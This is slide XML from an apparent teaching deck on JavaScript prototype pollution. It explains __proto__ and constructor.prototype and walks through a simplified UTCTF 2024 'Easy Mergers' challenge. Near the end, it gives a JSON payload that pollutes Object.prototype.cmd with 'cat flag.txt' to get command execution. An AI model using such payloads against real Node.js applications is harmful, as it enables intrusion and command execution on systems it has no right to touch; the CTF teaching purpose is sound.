                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19776936-DC02-4FDB-835A-6B72ED2EC960}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9033" y="4352192"/>
              <a:ext cx="1443686" cy="523220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>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00979D"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>new</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="434F54"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="D35400"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Object</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="434F54"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C2A062C-9EFE-2702-6D9A-521B2572BA24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2230225" y="4103238"/>
              <a:ext cx="1986560" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="D35400"/>
                  </a:solidFill>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endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="TextBox 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3D76201-4EC1-1EFD-D78D-8DD96028FF0F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="436535" y="3671523"/>
              <a:ext cx="840213" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="D35400"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Object</a:t>
              </a:r>
              <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9303E4B-F636-5129-705F-79DA676DBDEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="54604" y="3979300"/>
              <a:ext cx="1355599" cy="432269"/>
              <a:chOff x="54604" y="3979300"/>
              <a:chExt cx="1355599" cy="432269"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="41" name="Connector: Curved 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3005EF93-043C-BBC2-07C5-5C2D7ED44736}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="31" idx="0"/>
                <a:endCxn id="33" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="607313" y="4102863"/>
                <a:ext cx="372892" cy="12576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B8F6323-13A4-A759-0577-5821134B7B7F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="54604" y="4103792"/>
                <a:ext cx="1355599" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="434F54"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>constructor</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="35" name="Group 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF8F0D06-6B8D-8B7D-EC0E-DA0072F3C24B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1194064" y="3825412"/>
              <a:ext cx="1143495" cy="431715"/>
              <a:chOff x="1194064" y="3825412"/>
              <a:chExt cx="1143495" cy="431715"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="39" name="Connector: Curved 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52787891-43D5-D0ED-41A6-5FF54DC5F585}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="33" idx="3"/>
                <a:endCxn id="32" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1276748" y="3825412"/>
                <a:ext cx="953477" cy="431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CAC64D6-73BF-F04A-5251-25CE763C9F77}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1194064" y="3881615"/>
                <a:ext cx="1143495" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-HK" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="434F54"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>prototype</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="Group 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F1C2669-A2B5-939F-59D9-48A95659D9D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1396311" y="4257127"/>
              <a:ext cx="1562991" cy="468336"/>
              <a:chOff x="1396311" y="4257127"/>
              <a:chExt cx="1562991" cy="468336"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="37" name="Connector: Curved 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71617976-0188-6586-F7FF-E3518F81183A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="31" idx="3"/>
                <a:endCxn id="32" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="1452719" y="4257127"/>
                <a:ext cx="777506" cy="35667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AC21AD8-1E6E-5F7D-7458-C616D38EA711}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1396311" y="4417686"/>
                <a:ext cx="1562991" cy="307777"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="9B8D8F"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>[[Prototype]]</a:t>
                </a:r>
                <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4060102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Polluting prototypes 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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Be mindful: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>Most of the time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, we are not trying to set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>the prototype of an object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> to our desired value, but we are trying to set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" i="1" dirty="0"/>
              <a:t>the properties of the prototype of an object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> to our desired value</a:t>
            </a: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const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> a = {}</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({}).__proto__ = {hand: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLs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Set the prototype of an object to our desired value; not work, only changes th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e prototype for one object (which may be enough)</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 hand: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLs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({}).__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto__.hand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"knife"</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Set the property of the prototype of an object to our desired value; works, changes the prototype for almost all objects</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434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.hand</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endParaRPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="434F54"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2397245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Polluting prototypes 3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US"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You are unlikely to see vulnerable code that directly references </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__proto__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>constructor.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>proto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>; though sometimes it does appear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Instead, you are more likely to see vulnerable code in the format of setting an object with a dynamic property name, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>object[name] = value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Imagine if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> is a prototype, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> is your desired property name, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> is your desired value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>UTCTF 2024/Easy Mergers [1] (mentioned again, but with a different writeup) is a good example, and we are finally going to try a simplified version of it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Run “node ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1"/>
              <a:t>polluting_prototypes.mjs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>” and check if it is working by navigating to “/” again</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15844A00-A672-DF8F-4088-A1824F6D0D79}"/>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https://ctftime.org/writeup/39045</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="582673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400" dirty="0"/>
              <a:t>Polluting prototypes: UTCTF 2024/Easy Mergers</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" sz="24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7650" y="1321200"/>
            <a:ext cx="7688700" cy="3428651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>Inspecting the code would indicate that we need to pollute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D35400"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.prototype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> such that its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> property </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>has the value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"cat flag.txt"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>We want to run some code that is equivalent to one of the following lines of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>an_obj.__proto__.cmd = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"cat flag.txt"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an_obj.constructor.prototype.cmd = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"cat flag.txt"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>There are three potentially vulnerable lines of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pP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key</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values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key</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concat</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values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data</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values</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>orig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> is always a non-prototype </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>object; otherwise, we can control everything else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>As we need </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>at least two property access to set a property on the prototype given that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="268BD2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>orig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t> is a non-prototype </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>, only the first line of code is vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>The resulting JSON payload is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"attributes"</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"__proto__"</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"values"</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err="1">
                <a:solidFill>
                  <a:srgbClr val="859900"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</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"cat flag.txt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1100" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="657B83"/>
                </a:solidFill>
                <a:effectLst/>
